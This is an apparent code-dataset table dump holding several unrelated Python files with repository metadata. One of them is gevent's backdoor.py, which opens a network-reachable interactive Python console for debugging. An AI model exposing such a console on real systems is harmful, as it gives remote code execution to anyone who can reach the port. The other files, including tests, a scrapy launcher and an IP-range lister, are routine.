hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9ed4c95b11ddd761bdc51c8d9a831201ff7973eb | 1,080 | py | Python | pandas_support/test_pandas_support.py | quanbingDG/sharper | 4cd5c6b3238d5e430d5986829cc4e0bb47ab3dff | [
"MIT"
]
| null | null | null | pandas_support/test_pandas_support.py | quanbingDG/sharper | 4cd5c6b3238d5e430d5986829cc4e0bb47ab3dff | [
"MIT"
]
| 2 | 2021-01-13T03:39:15.000Z | 2021-01-19T08:50:18.000Z | pandas_support/test_pandas_support.py | quanbingDG/sharper | 4cd5c6b3238d5e430d5986829cc4e0bb47ab3dff | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
# @Time : 2020/11/9 9:13 下午
# @Author : quanbing
# @Email : [email protected]
import pandas as pd
import numpy as np
from unittest import TestCase
from pandas_support import PandasSupport as PS
# @File : test_pandas_support.py
class TestPandasSupport(TestCase):
def setUp(self) -> None:
self._test_frame = pd.DataFrame(np.array([1, 2, 3, 4]).reshape(2, 2), columns=['i1', 'i2'])
def test_check_cols(self):
self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1']), True)
self.assertEqual(PS.check_cols(['col1', 'col2'], ['col']), False)
self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1', 'col3']), False)
self.assertEqual(PS.check_cols(['col1', 'col2'], 'col1'), True)
def test_add_ratio(self):
self.assertEqual(PS.add_ratio(self._test_frame, ['i1']).columns.__len__(), 3)
self.assertEqual(PS.add_ratio(self._test_frame, ['i1'], csum=True).columns.__len__(), 4)
def test_add_csum(self):
self.assertEqual(PS.add_csum(self._test_frame, 'i1').columns.__len__(), 3)
| 38.571429 | 99 | 0.655556 | 825 | 0.76107 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.214022 |
9ed4d88c4f6045e4df06f3ac9733b88b158d09a9 | 245 | py | Python | 08-About_scrapy/douban/main.py | jiaxiaochu/spider | 4b0f751f76a31556a91dea719873cf2979e4be94 | [
"MIT"
]
| null | null | null | 08-About_scrapy/douban/main.py | jiaxiaochu/spider | 4b0f751f76a31556a91dea719873cf2979e4be94 | [
"MIT"
]
| 1 | 2020-08-27T10:25:38.000Z | 2020-08-27T10:25:38.000Z | 08-About_scrapy/douban/main.py | jiaxiaochu/spider | 4b0f751f76a31556a91dea719873cf2979e4be94 | [
"MIT"
]
| null | null | null | # !/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
# -*- coding:utf-8 -*-
# @Author : Jiazhixiang
# 导入cmdline模块,可以实现控制终端命令行。
from scrapy import cmdline
# 用execute()方法,输入运行scrapy的命令。
cmdline.execute(['scrapy', 'crawl', 'douban'])
| 24.5 | 64 | 0.726531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 247 | 0.809836 |
9ed556610d4e386e3f7c1552b11e15722ee31053 | 1,125 | py | Python | DynamicProgramming/longestIncreasingSubsequence.py | suyash248/data_structures | 41a732cebf791ed63edbce10329251f03b763ccf | [
"Apache-2.0"
]
| 7 | 2017-12-13T05:54:29.000Z | 2022-03-25T09:10:59.000Z | DynamicProgramming/longestIncreasingSubsequence.py | suyash248/data_structures | 41a732cebf791ed63edbce10329251f03b763ccf | [
"Apache-2.0"
]
| null | null | null | DynamicProgramming/longestIncreasingSubsequence.py | suyash248/data_structures | 41a732cebf791ed63edbce10329251f03b763ccf | [
"Apache-2.0"
]
| 4 | 2019-05-22T02:51:56.000Z | 2021-05-23T10:49:57.000Z | from Array import empty_1d_array
"""
input array : [10, 22, 9, 33, 21, 50, 41, 60]
# Element at each index `i` is representing length of longest LIS from index 0 to i in input array.
output array: [1, 2, 1, 3, 2, 4, 4, 5]
"""
# Time complexity: O(n^2)
# Space complexity: O(n)
def lis_dp(arr):
# Length of LIS at each index is at least 1 (element itself).
n = len(arr)
lis_arr = empty_1d_array(n, 1)
for i in xrange(1, n): # for i=1; i<n; i++
for j in xrange(0, i): # for j=0; j<i; j++
if arr[i] > arr[j] : # and lis_arr[i] < lis_arr[j]+1:
prev_lis_till_i = lis_arr[i]
curr_lis_till_i = lis_arr[j] + 1
if curr_lis_till_i > prev_lis_till_i:
# Update lis_till_i
lis_arr[i] = curr_lis_till_i
# print lis_arr
return max(lis_arr)
if __name__ == '__main__':
arr = [10, 22, 9, 33, 21, 50, 41, 60]
max_lis = lis_dp(arr)
print "Length of longest increasing sub-sequence for given array is {}".format(max_lis) | 36.290323 | 99 | 0.543111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 494 | 0.439111 |
9ed6cf9a0648712f69e8e03077835798f4836842 | 4,318 | py | Python | venv/Lib/site-packages/gevent/backdoor.py | Kiiwi/Syssel | 83705e3fd0edf40f09df950d5ce91c95586573f5 | [
"BSD-3-Clause"
]
| null | null | null | venv/Lib/site-packages/gevent/backdoor.py | Kiiwi/Syssel | 83705e3fd0edf40f09df950d5ce91c95586573f5 | [
"BSD-3-Clause"
]
| null | null | null | venv/Lib/site-packages/gevent/backdoor.py | Kiiwi/Syssel | 83705e3fd0edf40f09df950d5ce91c95586573f5 | [
"BSD-3-Clause"
]
| null | null | null | # Copyright (c) 2009-2014, gevent contributors
# Based on eventlet.backdoor Copyright (c) 2005-2006, Bob Ippolito
from __future__ import print_function
import sys
from code import InteractiveConsole
from gevent import socket
from gevent.greenlet import Greenlet
from gevent.hub import PY3, PYPY, getcurrent
from gevent.server import StreamServer
if PYPY:
import gc
__all__ = ['BackdoorServer']
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
try:
sys.ps2
except AttributeError:
sys.ps2 = '... '
class _Greenlet_stdreplace(Greenlet):
_fileobj = None
def switch(self, *args, **kw):
if self._fileobj is not None:
self.switch_in()
Greenlet.switch(self, *args, **kw)
def switch_in(self):
self.saved = sys.stdin, sys.stderr, sys.stdout
sys.stdin = sys.stdout = sys.stderr = self._fileobj
def switch_out(self):
sys.stdin, sys.stderr, sys.stdout = self.saved
self.saved = None
def run(self):
try:
return Greenlet.run(self)
finally:
# XXX why is this necessary?
self.switch_out()
class BackdoorServer(StreamServer):
"""Provide a backdoor to a program for debugging purposes.
You may bind to any interface, but for security purposes it is recommended
that you bind to 127.0.0.1.
Basic usage:
>> from gevent.backdoor import BackdoorServer
>> server = BackdoorServer(('127.0.0.1', 5001),
... locals={'foo': "From defined scope!"})
>> server.serve_forever()
In a another terminal, connect with...
$ telnet 127.0.0.1 5001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Python 2.7.5 (default, May 12 2013, 12:00:47)
[GCC 4.8.0 20130502 (prerelease)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
(InteractiveConsole)
>> print foo
From defined scope!
"""
def __init__(self, listener, locals=None, banner=None, **server_args):
StreamServer.__init__(self, listener, spawn=_Greenlet_stdreplace.spawn, **server_args)
self.locals = locals
self.banner = banner
self.stderr = sys.stderr
def handle(self, conn, address):
f = getcurrent()._fileobj = _fileobject(conn)
f.stderr = self.stderr
getcurrent().switch_in()
try:
console = InteractiveConsole(self.locals)
# __builtins__ may either be the __builtin__ module or
# __builtin__.__dict__ in the latter case typing
# locals() at the backdoor prompt spews out lots of
# useless stuff
try:
import __builtin__
console.locals["__builtins__"] = __builtin__
except ImportError:
import builtins
console.locals["builtins"] = builtins
console.locals['__builtins__'] = builtins
console.interact(banner=self.banner)
except SystemExit: # raised by quit()
if not PY3:
sys.exc_clear()
finally:
conn.close()
f.close()
if PYPY:
# The underlying socket somewhere has a reference
# that's not getting closed until finalizers run.
# Without running them, test__backdoor.Test.test_sys_exit
# hangs forever
gc.collect()
class _fileobject(socket._fileobject):
if not PY3:
def write(self, data):
self._sock.sendall(data)
else:
def write(self, data):
if isinstance(data, str):
data = data.encode('utf-8')
self._sock.sendall(data)
def isatty(self):
return True
def flush(self):
pass
def _readline(self, *a):
return socket._fileobject.readline(self, *a).replace(b"\r\n", b"\n")
if not PY3:
readline = _readline
else:
def readline(self, *a):
line = self._readline(*a)
return line.decode('utf-8')
if __name__ == '__main__':
if not sys.argv[1:]:
print('USAGE: %s PORT' % sys.argv[0])
else:
BackdoorServer(('127.0.0.1', int(sys.argv[1])), locals={'hello': 'world'}).serve_forever()
| 29.175676 | 98 | 0.598194 | 3,576 | 0.828161 | 0 | 0 | 0 | 0 | 0 | 0 | 1,433 | 0.331867 |
9ed839d6a98ae914dcbccc4b145b5eaa923e4f41 | 7,385 | py | Python | spark/par_decompress_audio.py | droyston/spectralize | 572770e7358acc3ec433470659759c17453409f2 | [
"MIT"
]
| null | null | null | spark/par_decompress_audio.py | droyston/spectralize | 572770e7358acc3ec433470659759c17453409f2 | [
"MIT"
]
| null | null | null | spark/par_decompress_audio.py | droyston/spectralize | 572770e7358acc3ec433470659759c17453409f2 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 17 16:12:56 2020
@author: dylanroyston
"""
# import/configure packages
import numpy as np
import pandas as pd
#import pyarrow as pa
import librosa
import librosa.display
from pathlib import Path
#import Ipython.display as ipd
#import matplotlib.pyplot as plt
from pyspark.sql import *
import pyspark.sql.functions as f
from pyspark import SparkConf, SparkContext, SQLContext
import boto3
from tinytag import TinyTag as tt
import soundfile as sf
import audioread
from pydub import AudioSegment
from io import BytesIO
#from io import BytesIO
import os
import sys
import time
import struct
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/lib")
#import config
time_seq = []
#####
# create local Spark instance (for non-cluster dev)
sc = SparkContext('local')
spark = SparkSession (sc)
spark.conf.set("spark.sql.execution.arrow.enabled", "true")
# define Spark config
def spark_conf():
conf = SparkConf().setAppName("decompress_audio_files")
sc = SparkContext(conf=conf)
spark = SparkSession.builder.getOrCreate()
return spark
spark = spark_conf()
spark.conf.set("spark.sql.execution.arrow.enabled", "true")
#####
# Function to write spark-dataframe to mySQL
def write_df_to_psql(df, tablename):
psql_user = os.environ.get('PSQL_USR')
psql_pwd = os.environ.get('PSQL_PWD')
df.write.format('jdbc').options(
url='jdbc:postgresql://10.0.0.6:5432/spectralize',
dbtable=tablename,
user=psql_user,
#password=psql_pwd).mode('append').save()
password=psql_pwd).save()
#####
# function to read audio files from S3 bucket and extract tags
def read_audio_files():
# basic initialization
time_seq.append(['start-read-audio', time.time()])
# DataFrame schema
File_Tags = Row("s3_key", "song_id", "album", "albumartist", "artist",
"audio_offset", "bitrate", "channels", "comment", "composer",
"disc", "disc_total", "duration", "filesize", "genre",
"samplerate", "title", "track", "track_total", "year")
spec_labels = []
for sn in range(0,128):
spec_labels.append('spec' + str(sn+1))
spec_df_labels = ['song_id','timeseries'] + spec_labels
Spec_Tags = Row(spec_df_labels)
# configure S3 access
s3_bucket = 'mdp-spectralize-pal'
number_of_files = 0
s3 = boto3.resource('s3')
boto_client = boto3.client('s3')
bucket = s3.Bucket(s3_bucket)
number_of_files=0
file_limit=100
#local_path = './local_file.'
known_ext = [".mp3", ".wav", ".m4a"]
#read each file from S3 bucket
for obj in bucket.objects.all():
s3_key = obj.key
audio_obj_stream = boto_client.get_object(Bucket=s3_bucket, Key=s3_key)
audio_obj = BytesIO(audio_obj_stream['Body'].read())
song = bytes(audio_obj)
song = sf.SoundFile(audio_obj)
song = open(audio_obj, 'rb').read()
song = audioread.audio_open(audio_obj)
# extract tags from mp3 files
#if "mp3" in s3_key:
#if any(ext in s3_key for ext in known_ext):
#print(number_of_files)
#ext = s3_key[-4:]
#local_path = './localfile' + ext
number_of_files+=1
#bucket.download_file(s3_key, local_path)
local_path = '/home/dylanroyston/Music/spectralize_data/01 Konoha Densetsu.mp3'
song = open(local_path, 'rb').read()
##### tags
tags = tt.get(local_path)
tags = tt.get(audio_obj)
# extract tags from tinytag object
indiv_tags = (s3_key, number_of_files, tags.album, tags.albumartist, tags.artist,
tags.audio_offset, tags.bitrate, tags.channels,
tags.comment, tags.composer, tags.disc,
tags.disc_total, tags.duration, tags.filesize,
tags.genre, tags.samplerate, tags.title, tags.track,
tags.track_total, tags.year)
# convert tuple object to list
indiv_tag_list = list(indiv_tags)
indiv_tag_list = [str(i) for i in indiv_tag_list]
tag_seq=[]
tag_seq.append(indiv_tag_list)
tags_pdf = pd.DataFrame(data=tag_seq)
tag_df = spark.createDataFrame(tags_pdf, schema=File_Tags)
##### audio
# load audio file with Librosa
#y, sr = librosa.load(str(Path(local_path)), sr=None)
y, sr = librosa.load(local_path, sr=None)
# create indexing variables (song_id, timestamp)
# song_id defined as "repeat(number_of_files)"
song_num = pd.Series([number_of_files])
num_points = len(y)
song_id = song_num.repeat(num_points)
song_id = song_id.to_numpy()
# timeseries defined as "1 : length(audio_data)"
timeseries = np.arange(num_points)
timeseries = timeseries.transpose()
full_audio = {'song_id': song_id, 'timeseries': timeseries,
'intensity': y}
# create combined dataframe
audio_pdf = pd.DataFrame(data = full_audio)
audio_df = spark.createDataFrame(audio_pdf)
##### spectral
S = librosa.feature.melspectrogram(y, sr=sr, n_mels=128, fmax=10000)
log_S = librosa.power_to_db(S, ref=np.max)
log_S = log_S.transpose()
# song_id defined as "repeat(number_of_files)"
song_num = pd.Series([number_of_files])
num_points = len(S.transpose())
song_id = song_num.repeat(num_points)
song_id = song_id.to_numpy()
# timeseries defined as "1 : length(audio_data)"
timeseries = np.arange(num_points)
timeseries = timeseries.transpose()
full_index = {'song_id': song_id, 'timeseries': timeseries}
index_pdf = pd.DataFrame(full_index)
spec_pdf = pd.DataFrame(data=log_S, columns=spec_labels)
full_spec = pd.concat([index_pdf, spec_pdf], axis=1)
spec_df = spark.createDataFrame(full_spec)
##### write dataframes to psql
write_df_to_psql(tag_df, 'clean_metadata')
write_df_to_psql(audio_df, 'clean_audio')
write_df_to_psql(spec_df, 'clean_spec')
# stop process when file_limit is crossed (small batches)
if (number_of_files >= file_limit):
break
#####
time_seq.append(['end read-file', time.time()])
#df_tags = spark.createDataFrame(tag_seq, schema=File_Tags)
#df_audio = spark.createDataFrame(audio_seq)
#df_spec = spark.createDataFrame(audio_seq, schema=Spec_Tags)
# Additional run to
#df_audio_data = spark.createDataFrame(file_audio_data)
#process_df(df_audio_data)
#####
if __name__ == '__main__':
time_seq.append(['start', time.time()])
read_audio_files()
| 27.867925 | 90 | 0.59499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,314 | 0.313338 |
9eda27b08876015d63b9cfdc12be859142fbbd21 | 1,073 | py | Python | get_ip_list_ru_gov.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
]
| 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | get_ip_list_ru_gov.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
]
| 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | get_ip_list_ru_gov.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
]
| 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
"""
Скрипт выводит список ip государственных организаций.
"""
import ipaddress
import sys
import requests
rs = requests.get('https://jarib.github.io/anon-history/RuGovEdits/ru/latest/ranges.json')
# Проверка удачного запроса и полученных данных
if not rs or not rs.json() or 'ranges' not in rs.json():
print('Не получилось получить список ip государственных организаций')
sys.exit()
# Получение и сортировка элементов по названию организации
items = sorted(rs.json()['ranges'].items(), key=lambda x: x[0])
ip_counter = 0
for i, (name, ip_network_list) in enumerate(items, 1):
print(f'{i}. {name}')
# Получение ip с маской подсети
for ip_network in ip_network_list:
print(f' {ip_network}:')
# Получение ip подсети
net4 = ipaddress.ip_network(ip_network)
# Перебор ip адресов указанной организации
for ip in net4.hosts():
print(f' {ip}')
ip_counter += 1
print()
print('Всего ip:', ip_counter)
| 22.354167 | 90 | 0.665424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 791 | 0.591181 |
9edc1088501805cae0cb1dc1f360911a6998aed9 | 1,337 | py | Python | test_collection.py | Rodrun/weatherguess | 468ae8f6484ee3e3e82262ae10d845fd2d9b4267 | [
"MIT"
]
| null | null | null | test_collection.py | Rodrun/weatherguess | 468ae8f6484ee3e3e82262ae10d845fd2d9b4267 | [
"MIT"
]
| null | null | null | test_collection.py | Rodrun/weatherguess | 468ae8f6484ee3e3e82262ae10d845fd2d9b4267 | [
"MIT"
]
| null | null | null | import unittest
import requests
from collection import Collection
class TestCollection(unittest.TestCase):
def setUp(self):
# Get the sample JSON data
self.data = requests.get("http://samples.openweathermap.org/data/2.5/weather?zip=94040,us&appid=b6907d289e10d714a6e88b30761fae22").json()
self.coll = Collection(getlist=["weather.main", "main.temp", "clouds.all", "doesntExist"])
self.dcoll = Collection()
def test_detect_none(self):
"""
Test if get_weather returns a list of the default value when given None.
"""
self.assertCountEqual([x for x in self.coll.get_weather(None)],
[0. for i in range(0, len(self.coll.get_getlist()))])
def test_get_weather(self):
"""
Test if get_weather functions correctly.
"""
data = [x for x in self.coll.get_weather(self.data)]
self.assertIsInstance(data[0], str)
self.assertIsInstance(data[1], float)
self.assertIsInstance(data[2], int)
self.assertEqual(data[3], 0.)
def test_get_weather_defaults(self):
"""
Test if get_weather functions correctly using the default getlist.
"""
data = [x for x in self.dcoll.get_weather(self.data)]
self.assertIsNotNone(data)
print(data)
| 34.282051 | 145 | 0.635004 | 1,268 | 0.948392 | 0 | 0 | 0 | 0 | 0 | 0 | 430 | 0.321616 |
9edc4b896c4673af8ba61e91bf9ac87a555fe75f | 272 | py | Python | tests/bitwiseOperations/__init__.py | mgorzkowski/abn | 3a9ac6fb0cfe9d497b6d8f26373d2af3b6ff9860 | [
"MIT"
]
| 4 | 2018-04-24T15:25:55.000Z | 2022-03-08T15:01:07.000Z | tests/bitwiseOperations/__init__.py | mgorzkowski/abn | 3a9ac6fb0cfe9d497b6d8f26373d2af3b6ff9860 | [
"MIT"
]
| 2 | 2021-05-04T19:44:28.000Z | 2021-05-05T11:51:15.000Z | tests/bitwiseOperations/__init__.py | mgorzkowski/abn | 3a9ac6fb0cfe9d497b6d8f26373d2af3b6ff9860 | [
"MIT"
]
| null | null | null | from . import nand_tests
from . import and_tests
from . import nor_tests
from . import not_tests
from . import or_tests
from . import xor_tests
from . import rotate_left_tests
from . import rotate_right_tests
from . import shift_left_tests
from . import shift_right_tests
| 24.727273 | 32 | 0.816176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
9edd07604a3a97e4febf7283f02a7a1e61075cbb | 36,220 | py | Python | exot/util/misc.py | ETHZ-TEC/exot_eengine | 7b7ce6cb949e1b0a02e716b03f2f9af751713b29 | [
"BSD-3-Clause"
]
| null | null | null | exot/util/misc.py | ETHZ-TEC/exot_eengine | 7b7ce6cb949e1b0a02e716b03f2f9af751713b29 | [
"BSD-3-Clause"
]
| null | null | null | exot/util/misc.py | ETHZ-TEC/exot_eengine | 7b7ce6cb949e1b0a02e716b03f2f9af751713b29 | [
"BSD-3-Clause"
]
| null | null | null | # Copyright (c) 2015-2020, Swiss Federal Institute of Technology (ETH Zurich)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""Misc helpers"""
import math
import random
import re
import signal
import typing as t
from datetime import datetime
from enum import Enum
from functools import reduce
from inspect import isabstract
from string import ascii_letters
from subprocess import list2cmdline as _list2cmdline
from typing import Mapping as Map
import numpy as np
from exot.exceptions import *
__all__ = (
"call_with_leaves",
"dict_depth",
"dict_diff",
"find_attributes",
"flatten_dict",
"get_concrete_subclasses",
"get_subclasses",
"get_valid_access_paths",
"getitem",
"has_method",
"has_property",
"has_type",
"has_variable",
"is_abstract",
"is_scalar_numeric",
"leaves",
"list2cmdline",
"map_to_leaves",
"mro_getattr",
"mro_hasattr",
"random_string",
"safe_eval",
"sanitise_ansi",
"setgetattr",
"setitem",
"stub_recursively",
"unpack__all__",
"validate_helper",
"get_cores_and_schedules",
)
"""
Signatures
----------
call_with_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> None
dict_depth :: (obj: Any, level: int = 0) -> int
dict_diff :: (left: Mapping, right: Mapping) -> List[Dict]
find_attributes :: (attr: str, klass: Any) -> List
flatten_dict :: (obj: Mapping, sep: str = '.') -> Mapping
get_concrete_subclasses :: (klass, recursive=True, derived=True) -> List
get_subclasses :: (klass, recursive=True, derived=True) -> List
get_valid_access_paths :: (obj: Mapping, _limit: int = 8192, _leaf_only: bool = False, _use_lists: bool = True, _fallthrough_empty: bool = True) -> Generator
getitem :: (obj: Mapping, query: Union[str, Tuple], *args: Any, sep: str = '/') -> Any
has_method :: (klass: Union[type, object], name: str) -> bool
has_property :: (klass: Union[type, object], name: str) -> bool
has_type :: (klass: Union[type, object]) -> bool
has_variable :: (klass: Union[type, object], name: str) -> bool
is_abstract :: (klass: Union[type, object]) -> bool
is_scalar_numeric :: (value: t.Any) -> bool
map_to_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> Any
mro_getattr :: (cls: type, attr: str, *args: Any) -> Any
mro_hasattr :: (cls: type, attr: str) -> bool
random_string :: (length: int) -> str
safe_eval :: (to_eval: str, expect: Tuple[type], timeout: int) -> object
sanitise_ansi :: (value Union[List[str], str]) -> Union[List[str], str]
setgetattr :: (klass: Union[type, object], attr: str, default: Any) -> None
setitem :: (obj: MutableMapping, query: Tuple, value: Any) -> None
stub_recursively :: (obj: ~T, stub: Any = None, _stub_list_elements: bool = True) -> Optional[~T]
unpack__all__ :: (*imports: Collection[str]) -> Tuple[str]
validate_helper :: (what: Mapping, key: Any, *types: type, msg: str = '') -> NoReturn
"""
def call_with_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> None:
"""Calls a function on leaves of an object
A leaf is considered to be an object that is not a Mapping (or, when _seq is set,
also not a Sequence except a string, which is also a Sequence).
Args:
function (t.Callable[[t.Any], t.Any]): The callable
obj (t.T): The tree-like or sequence-like object
_seq (bool, optional): Should sequences be considered?. Defaults to True.
"""
def inner(obj: t.T) -> t.Any:
if isinstance(obj, Map):
for v in obj.values():
inner(v)
elif _seq and isinstance(obj, (t.List, t.Set)):
for v in obj:
inner(v)
else:
return function(obj)
inner(obj)
def dict_depth(obj: t.Any, level: int = 0) -> int:
"""Get maximum depth of a dict-like object
Args:
obj (t.Any): The dict-like object
level (int): For internal use only. Defaults to 0.
.. note::
The depth of a non-dict-like object is considered to be 0.
An empty dict increases the depth if `_empty_increments` is True.
Examples:
>>> dict_depth(1) # returns 0
>>> dict_depth([1,2,3]) # returns 0
>>> dict_depth({1: 1, 2: 2}) # returns 1
>>> dict_depth({1: {2: {3: 3}}}) # returns 3
>>> dict_depth({1: {2: {3: {}}}}) # returns 4
"""
if not isinstance(obj, Map) or not obj:
return level
return max(dict_depth(v, level + 1) for k, v in obj.items())
def dict_diff(left: Map, right: Map) -> t.List[t.Dict]:
"""Get the difference between 2 dict-like objects
Args:
left (Map): The left dict-like object
right (Map): The right dict-like object
The value returned is a list of dictionaries with keys ["path", "left", "right"]
which contain the query path and the differences between the left and right mapping.
If a key is missing in either mapping, it will be indicated as a "None".
`math.nan` (not-a-number) is used for default values in the comparison because of
the property: `math.nan != math.nan`. Simple None cannot be used, since it would
not handle keys that both have a value of None. In general, this function might
report false-positives for keys that contain the math.nan (or np.nan) value simply
due to this property. There is no workaround available.
"""
left_paths = set(get_valid_access_paths(left, _leaf_only=True, _use_lists=False))
right_paths = set(get_valid_access_paths(right, _leaf_only=True, _use_lists=False))
return list(
{
"path": path,
"left": getitem(left, path, math.nan),
"right": getitem(right, path, math.nan),
}
for path in left_paths.union(right_paths)
if getitem(left, path, math.nan) != getitem(right, path, math.nan)
)
def find_attributes(klass: t.Any, attr: str) -> t.List:
"""Find attributes in any of a class'es bases
Args:
klass (t.Any): The type object
attr (str): The attribute
Returns:
t.List: List of found instances of the attribute in the class hierarchy
"""
if not isinstance(attr, str):
raise TypeError(attr)
mro = klass.__mro__ if hasattr(klass, "__mro__") else type(klass).mro()
return [attr for base in mro if hasattr(base, attr)]
def flatten_dict(obj: Map, sep: str = ".") -> Map:
"""Flatten a dict to a 1-level dict combining keys with a separator
Args:
obj (Map): The dict-like object
sep (str): The separator used when combining keys. Defaults to ".".
Returns:
Map: A flattened object of same type as 'obj'.
.. warning::
Flattening will enforce all keys to be string-types!
`reducer` is a function accepted by the functools.reduce function, which is of
form: f(a, b) where _a_ is the accumulated value, and _b_ is the updated value
from the iterable.
The .items() function produces key-value tuple-pairs. These can be expanded
with *, e.g. `*("a", "b")` will expand to `"a", "b"`. This property is used
to expand the `kv_pair` below.
Example walkthrough on `flatten_dict({'a': 1, 'b': {'c': {'d': 2}}})`: ::
`outer` <- obj: {'a': 1, 'b': {'c': {'d': 2}}}, prefix: ''
`reducer` <- key: 'a', value: 1
`inner` <- acc: {}, key: 'a', value: 1, prefix: ''
`inner` -> {'a': 1}
`reducer` -> {'a': 1}
`reducer` <- key: 'b', value: {'c': {'d': 2}}
`inner` <- acc: {'a': 1}, key: 'b', value: {'c': {'d': 2}}, prefix: ''
`outer` <- obj: {'c': {'d': 2}}, prefix: 'b.'
`reducer` <- key: 'c', value: {'d': 2}
`inner` <- acc: {}, key: 'c', value: {'d': 2}, prefix: 'b.'
`outer` <- obj: {'d': 2}, prefix: 'b.c.'
`reducer` <- key: 'd', value: 2
`inner` <- acc: {}, key: 'd', value: 2, prefix: 'b.c.'
`inner` -> {'b.c.d': 2}
`reducer` -> {'b.c.d': 2}
`outer` -> {'b.c.d': 2}
`inner` -> {'b.c.d': 2}
`reducer` -> {'b.c.d': 2}
`outer` -> {'b.c.d': 2}
`inner` -> {'a': 1, 'b.c.d': 2}
`reducer` -> {'a': 1, 'b.c.d': 2}
`outer` -> {'a': 1, 'b.c.d': 2}
"""
if not isinstance(obj, Map):
raise TypeError("flatten_dict works only on dict-like types", type(obj))
_t = type(obj)
def outer(obj: Map, prefix: str) -> Map:
def reducer(accumulator: Map, kv_pair: t.Tuple):
return inner(accumulator, *kv_pair, prefix)
return reduce(reducer, obj.items(), _t())
def inner(accumulator: Map, key: str, value: t.Any, prefix: str) -> Map:
if isinstance(value, Map):
return _t(**accumulator, **outer(value, prefix + key + sep))
else:
return _t(**accumulator, **_t({prefix + key: value}))
return outer(obj, "")
def expand_dict(obj: Map, sep: str = ".") -> Map:
"""Expands a flattened mapping by splitting keys with the given separator
Args:
obj (Map): The flattened dict-like object to unflatten
sep (str, optional): The key separator
Raises:
TypeError: If wrong type is supplied
